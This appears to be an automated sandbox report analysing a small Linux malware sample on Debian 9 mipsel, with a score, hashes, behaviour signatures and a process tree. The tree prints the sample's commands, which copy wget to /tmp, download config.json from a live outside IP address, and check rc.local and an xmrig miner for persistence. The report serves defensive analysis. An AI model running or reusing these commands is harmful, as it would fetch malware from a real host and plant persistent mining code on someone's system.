Overview

overview

7

Static

static

1

ea79e6f3a9...kes118

ubuntu-18.04-amd64

7

ea79e6f3a9...kes118

debian-9-armhf

7

ea79e6f3a9...kes118

debian-9-mips

7

ea79e6f3a9...kes118

debian-9-mipsel

7

Analysis

  • max time kernel
    132s
  • max time network
    148s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    09-04-2024 17:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118

  • Size

    2KB

  • MD5

    ea79e6f3a96671aa051f677679c2bda0

  • SHA1

    2e2f085e81e8e750da43d8217541404ab78461e9

  • SHA256

    f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543

  • SHA512

    ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    1⤵
    • Modifies rc script
    PID:711
    • /bin/cp
      cp /usr/bin/wget .
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:733
    • /bin/chmod
      chmod +x wget
      2⤵
        PID:735
      • /tmp/wget
        ./wget -P /tmp/ http://103.45.185.68:6358/config.json
        2⤵
        • Executes dropped EXE
        PID:737
    • /bin/grep
      grep /etc/mlwk.sh
      1⤵
        PID:716
      • /bin/grep
        grep -v grep
        1⤵
          PID:717
        • /bin/cat
          cat /etc/rc.local
          1⤵
            PID:715
          • /bin/ps
            ps aux
            1⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:724
          • /bin/grep
            grep /tmp/xmrig
            1⤵
              PID:725
            • /bin/grep
              grep -v grep
              1⤵
                PID:726
              • /usr/bin/wc
                wc -l
                1⤵
                  PID:727

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /etc/rc.local
                  Filesize

                  18B

                  MD5

                  2e5bcdd3b23224ecae22093a9349b20a

                  SHA1

                  b4a63c6da233638e105eb63db7c2bf6dcf9b11c3

                  SHA256

                  4157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d

                  SHA512

                  c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7

                  Download Submit

                • /tmp/wget
                  Filesize

                  536KB

                  MD5

                  4a7c9f69532775b790e8d999f73a68b9

                  SHA1

                  9cf4d3d57284103e828dcaa514bfa76e84366472

                  SHA256

                  ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495

                  SHA512

                  925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128

                  Download Submit